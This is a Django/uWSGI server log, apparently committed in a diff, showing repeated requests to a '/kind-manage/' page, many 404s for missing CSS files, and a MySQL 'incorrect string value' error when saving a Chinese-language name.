+[pid: 11057|app: -1|req: -1/1168] 180.160.72.163 () {40 vars in 926 bytes} [Thu Jan 14 08:49:43 2021] GET /static/assets/plugins/styleswitcher/jQuery.style.switcher.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1)
+[pid: 11057|app: 0|req: 886/1169] 180.160.72.163 () {40 vars in 931 bytes} [Thu Jan 14 08:49:45 2021] GET /kind-manage/ => generated 8283 bytes in 8 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
+[pid: 11057|app: 0|req: 887/1170] 180.160.72.163 () {38 vars in 885 bytes} [Thu Jan 14 08:49:45 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+[pid: 11057|app: 0|req: 888/1171] 180.160.72.163 () {38 vars in 889 bytes} [Thu Jan 14 08:49:45 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/themify-icons/themify-icons.css
+[pid: 11057|app: 0|req: 889/1172] 180.160.72.163 () {38 vars in 873 bytes} [Thu Jan 14 08:49:45 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/linea-icons/linea.css
+[pid: 11057|app: 0|req: 890/1173] 180.160.72.163 () {38 vars in 853 bytes} [Thu Jan 14 08:49:45 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css
+[pid: 11057|app: 0|req: 891/1174] 180.160.72.163 () {38 vars in 873 bytes} [Thu Jan 14 08:49:45 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
+[pid: 11057|app: 0|req: 892/1175] 180.160.72.163 () {38 vars in 897 bytes} [Thu Jan 14 08:49:45 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 24 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css
+[pid: 11057|app: 0|req: 893/1176] 180.160.72.163 () {38 vars in 929 bytes} [Thu Jan 14 08:49:45 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/animate.css
+[pid: 11057|app: 0|req: 894/1177] 180.160.72.163 () {38 vars in 819 bytes} [Thu Jan 14 08:49:45 2021] GET /static/css/animate.css => generated 3513 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/spinners.css
+[pid: 11057|app: 0|req: 895/1178] 180.160.72.163 () {38 vars in 821 bytes} [Thu Jan 14 08:49:45 2021] GET /static/css/spinners.css => generated 3516 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+[pid: 11057|app: 0|req: 896/1179] 180.160.72.163 () {48 vars in 1026 bytes} [Thu Jan 14 08:49:48 2021] POST /kind-manage/ => generated 27 bytes in 14 msecs (HTTP/1.1 200) 6 headers in 179 bytes (1 switches on core 0)
+[pid: 11057|app: 0|req: 897/1180] 180.160.72.163 () {40 vars in 932 bytes} [Thu Jan 14 08:49:48 2021] GET /kind-manage/ => generated 7353 bytes in 7 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
+[pid: 11057|app: 0|req: 898/1181] 180.160.72.163 () {38 vars in 885 bytes} [Thu Jan 14 08:49:48 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
+[pid: 11057|app: 0|req: 899/1182] 180.160.72.163 () {38 vars in 897 bytes} [Thu Jan 14 08:49:48 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+[pid: 11057|app: 0|req: 900/1183] 180.160.72.163 () {38 vars in 889 bytes} [Thu Jan 14 08:49:48 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/themify-icons/themify-icons.css
+[pid: 11057|app: 0|req: 901/1184] 180.160.72.163 () {38 vars in 873 bytes} [Thu Jan 14 08:49:48 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css
+[pid: 11057|app: 0|req: 902/1185] 180.160.72.163 () {38 vars in 873 bytes} [Thu Jan 14 08:49:48 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/linea-icons/linea.css
+[pid: 11057|app: 0|req: 903/1186] 180.160.72.163 () {38 vars in 853 bytes} [Thu Jan 14 08:49:48 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 18 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css
+[pid: 11057|app: 0|req: 904/1187] 180.160.72.163 () {38 vars in 929 bytes} [Thu Jan 14 08:49:48 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/spinners.css
+[pid: 11057|app: 0|req: 905/1188] 180.160.72.163 () {38 vars in 821 bytes} [Thu Jan 14 08:49:48 2021] GET /static/css/spinners.css => generated 3516 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/animate.css
+[pid: 11057|app: 0|req: 906/1189] 180.160.72.163 () {38 vars in 819 bytes} [Thu Jan 14 08:49:48 2021] GET /static/css/animate.css => generated 3513 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+[pid: 11057|app: 0|req: 907/1190] 180.160.72.163 () {48 vars in 1026 bytes} [Thu Jan 14 08:49:50 2021] POST /kind-manage/ => generated 27 bytes in 17 msecs (HTTP/1.1 200) 6 headers in 179 bytes (1 switches on core 0)
+[pid: 11057|app: 0|req: 908/1191] 180.160.72.163 () {40 vars in 932 bytes} [Thu Jan 14 08:49:50 2021] GET /kind-manage/ => generated 6423 bytes in 9 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
+[pid: 11057|app: 0|req: 909/1192] 180.160.72.163 () {38 vars in 885 bytes} [Thu Jan 14 08:49:50 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
+[pid: 11057|app: 0|req: 910/1193] 180.160.72.163 () {38 vars in 897 bytes} [Thu Jan 14 08:49:50 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 10 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+[pid: 11057|app: 0|req: 911/1194] 180.160.72.163 () {38 vars in 889 bytes} [Thu Jan 14 08:49:50 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/linea-icons/linea.css
+[pid: 11057|app: 0|req: 912/1195] 180.160.72.163 () {38 vars in 853 bytes} [Thu Jan 14 08:49:50 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css
+[pid: 11057|app: 0|req: 913/1196] 180.160.72.163 () {38 vars in 873 bytes} [Thu Jan 14 08:49:50 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/themify-icons/themify-icons.css
+[pid: 11057|app: 0|req: 914/1197] 180.160.72.163 () {38 vars in 873 bytes} [Thu Jan 14 08:49:50 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 27 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css
+[pid: 11057|app: 0|req: 915/1198] 180.160.72.163 () {38 vars in 929 bytes} [Thu Jan 14 08:49:50 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/animate.css
+[pid: 11057|app: 0|req: 916/1199] 180.160.72.163 () {38 vars in 819 bytes} [Thu Jan 14 08:49:50 2021] GET /static/css/animate.css => generated 3513 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/spinners.css
+[pid: 11057|app: 0|req: 917/1200] 180.160.72.163 () {38 vars in 821 bytes} [Thu Jan 14 08:49:50 2021] GET /static/css/spinners.css => generated 3516 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+[pid: 11057|app: 0|req: 919/1201] 180.160.72.163 () {40 vars in 933 bytes} [Thu Jan 14 08:49:57 2021] GET /kind-manage/? => generated 6423 bytes in 13 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 11057|app: 0|req: 919/1202] 180.160.72.163 () {48 vars in 1026 bytes} [Thu Jan 14 08:49:57 2021] POST /kind-manage/ => generated 27 bytes in 14 msecs (HTTP/1.1 200) 6 headers in 179 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
+[pid: 11057|app: 0|req: 920/1203] 180.160.72.163 () {38 vars in 885 bytes} [Thu Jan 14 08:49:57 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+[pid: 11057|app: 0|req: 921/1204] 180.160.72.163 () {38 vars in 889 bytes} [Thu Jan 14 08:49:57 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/linea-icons/linea.css
+[pid: 11057|app: 0|req: 922/1205] 180.160.72.163 () {38 vars in 853 bytes} [Thu Jan 14 08:49:57 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/themify-icons/themify-icons.css
+[pid: 11057|app: 0|req: 923/1206] 180.160.72.163 () {38 vars in 873 bytes} [Thu Jan 14 08:49:57 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css
+[pid: 11057|app: 0|req: 924/1207] 180.160.72.163 () {38 vars in 873 bytes} [Thu Jan 14 08:49:57 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
+[pid: 11057|app: 0|req: 925/1208] 180.160.72.163 () {38 vars in 897 bytes} [Thu Jan 14 08:49:57 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 21 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css
+[pid: 11057|app: 0|req: 926/1209] 180.160.72.163 () {38 vars in 929 bytes} [Thu Jan 14 08:49:57 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/css/spinners.css
+[pid: 11057|app: 0|req: 927/1210] 180.160.72.163 () {38 vars in 821 bytes} [Thu Jan 14 08:49:57 2021] GET /static/css/spinners.css => generated 3516 bytes in 11 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/css/animate.css
+[pid: 11057|app: 0|req: 928/1211] 180.160.72.163 () {38 vars in 819 bytes} [Thu Jan 14 08:49:57 2021] GET /static/css/animate.css => generated 3513 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+[pid: 11057|app: 0|req: 929/1212] 180.160.72.163 () {40 vars in 933 bytes} [Thu Jan 14 08:50:01 2021] GET /kind-manage/ => generated 7366 bytes in 9 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
+[pid: 11057|app: 0|req: 930/1213] 180.160.72.163 () {38 vars in 885 bytes} [Thu Jan 14 08:50:01 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
+[pid: 11057|app: 0|req: 931/1214] 180.160.72.163 () {38 vars in 897 bytes} [Thu Jan 14 08:50:01 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 14 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+[pid: 11057|app: 0|req: 932/1215] 180.160.72.163 () {38 vars in 889 bytes} [Thu Jan 14 08:50:01 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 16 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/linea-icons/linea.css
+[pid: 11057|app: 0|req: 933/1216] 180.160.72.163 () {38 vars in 853 bytes} [Thu Jan 14 08:50:01 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css
+[pid: 11057|app: 0|req: 934/1217] 180.160.72.163 () {38 vars in 873 bytes} [Thu Jan 14 08:50:01 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/themify-icons/themify-icons.css
+[pid: 11057|app: 0|req: 935/1218] 180.160.72.163 () {38 vars in 873 bytes} [Thu Jan 14 08:50:01 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 30 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css
+[pid: 11057|app: 0|req: 936/1219] 180.160.72.163 () {38 vars in 929 bytes} [Thu Jan 14 08:50:01 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/spinners.css
+[pid: 11057|app: 0|req: 937/1220] 180.160.72.163 () {38 vars in 821 bytes} [Thu Jan 14 08:50:01 2021] GET /static/css/spinners.css => generated 3516 bytes in 14 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/animate.css
+[pid: 11057|app: 0|req: 938/1221] 180.160.72.163 () {38 vars in 819 bytes} [Thu Jan 14 08:50:01 2021] GET /static/css/animate.css => generated 3513 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+[pid: 11057|app: 0|req: 940/1222] 180.160.72.163 () {40 vars in 933 bytes} [Thu Jan 14 08:50:07 2021] GET /kind-manage/? => generated 7366 bytes in 40 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
+[pid: 11057|app: 0|req: 941/1223] 180.160.72.163 () {38 vars in 885 bytes} [Thu Jan 14 08:50:08 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 20 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/linea-icons/linea.css
+[pid: 11057|app: 0|req: 942/1224] 180.160.72.163 () {38 vars in 853 bytes} [Thu Jan 14 08:50:08 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
+[pid: 11057|app: 0|req: 943/1225] 180.160.72.163 () {38 vars in 897 bytes} [Thu Jan 14 08:50:08 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+[pid: 11057|app: 0|req: 944/1226] 180.160.72.163 () {38 vars in 889 bytes} [Thu Jan 14 08:50:08 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/themify-icons/themify-icons.css
+[pid: 11057|app: 0|req: 945/1227] 180.160.72.163 () {38 vars in 873 bytes} [Thu Jan 14 08:50:08 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css
+[pid: 11057|app: 0|req: 946/1228] 180.160.72.163 () {38 vars in 873 bytes} [Thu Jan 14 08:50:08 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 10 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css
+[pid: 11057|app: 0|req: 947/1229] 180.160.72.163 () {38 vars in 929 bytes} [Thu Jan 14 08:50:08 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 21 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/spinners.css
+[pid: 11057|app: 0|req: 948/1230] 180.160.72.163 () {38 vars in 821 bytes} [Thu Jan 14 08:50:08 2021] GET /static/css/spinners.css => generated 3516 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/animate.css
+[pid: 11057|app: 0|req: 949/1231] 180.160.72.163 () {38 vars in 819 bytes} [Thu Jan 14 08:50:08 2021] GET /static/css/animate.css => generated 3513 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Internal Server Error: /kind-manage/
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet
+ packet.raise_for_error()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception
+ raise errorclass(errno, errval)
+pymysql.err.DataError: (1366, "Incorrect string value: '\\xE6\\xA0\\xA1\\xE5\\x9B\\xAD...' for column 'k_name' at row 1")
+
+The above exception was the direct cause of the following exception:
+
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner
+ response = get_response(request)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response
+ response = wrapped_callback(request, *callback_args, **callback_kwargs)
+ File "./app01/views.py", line 541, in kind_manage
+ models.Kind.objects.create(k_name=k_name)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method
+ return getattr(self.get_queryset(), name)(*args, **kwargs)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 447, in create
+ obj.save(force_insert=True, using=self.db)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 754, in save
+ force_update=force_update, update_fields=update_fields)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 792, in save_base
+ force_update, using, update_fields,
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 895, in _save_table
+ results = self._do_insert(cls._base_manager, using, fields, returning_fields, raw)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 935, in _do_insert
+ using=using, raw=raw,
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method
+ return getattr(self.get_queryset(), name)(*args, **kwargs)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1254, in _insert
+ return query.get_compiler(using=using).execute_sql(returning_fields)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1397, in execute_sql
+ cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute
+ return super().execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute
+ return self._execute_with_wrappers(sql, params, many=False, executor=self._execute)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers
+ return executor(sql, params, many, context)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__
+ raise dj_exc_value.with_traceback(traceback) from exc_value
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet
+ packet.raise_for_error()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception
+ raise errorclass(errno, errval)
+django.db.utils.DataError: (1366, "Incorrect string value: '\\xE6\\xA0\\xA1\\xE5\\x9B\\xAD...' for column 'k_name' at row 1")
+[pid: 11057|app: 0|req: 949/1232] 180.160.72.163 () {48 vars in 1026 bytes} [Thu Jan 14 08:50:07 2021] POST /kind-manage/ => generated 207014 bytes in 250 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 1)
+[pid: 11057|app: 0|req: 950/1233] 180.160.72.163 () {40 vars in 933 bytes} [Thu Jan 14 08:50:12 2021] GET /kind-manage/ => generated 7366 bytes in 10 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
+[pid: 11057|app: 0|req: 951/1234] 180.160.72.163 () {38 vars in 885 bytes} [Thu Jan 14 08:50:13 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
+[pid: 11057|app: 0|req: 952/1235] 180.160.72.163 () {38 vars in 897 bytes} [Thu Jan 14 08:50:13 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+[pid: 11057|app: 0|req: 953/1236] 180.160.72.163 () {38 vars in 889 bytes} [Thu Jan 14 08:50:13 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/linea-icons/linea.css
+[pid: 11057|app: 0|req: 954/1237] 180.160.72.163 () {38 vars in 853 bytes} [Thu Jan 14 08:50:13 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css
+[pid: 11057|app: 0|req: 955/1238] 180.160.72.163 () {38 vars in 873 bytes} [Thu Jan 14 08:50:13 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/themify-icons/themify-icons.css
+[pid: 11057|app: 0|req: 956/1239] 180.160.72.163 () {38 vars in 873 bytes} [Thu Jan 14 08:50:13 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 24 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css
+[pid: 11057|app: 0|req: 957/1240] 180.160.72.163 () {38 vars in 929 bytes} [Thu Jan 14 08:50:13 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/css/spinners.css
+[pid: 11057|app: 0|req: 958/1241] 180.160.72.163 () {38 vars in 821 bytes} [Thu Jan 14 08:50:13 2021] GET /static/css/spinners.css => generated 3516 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/css/animate.css
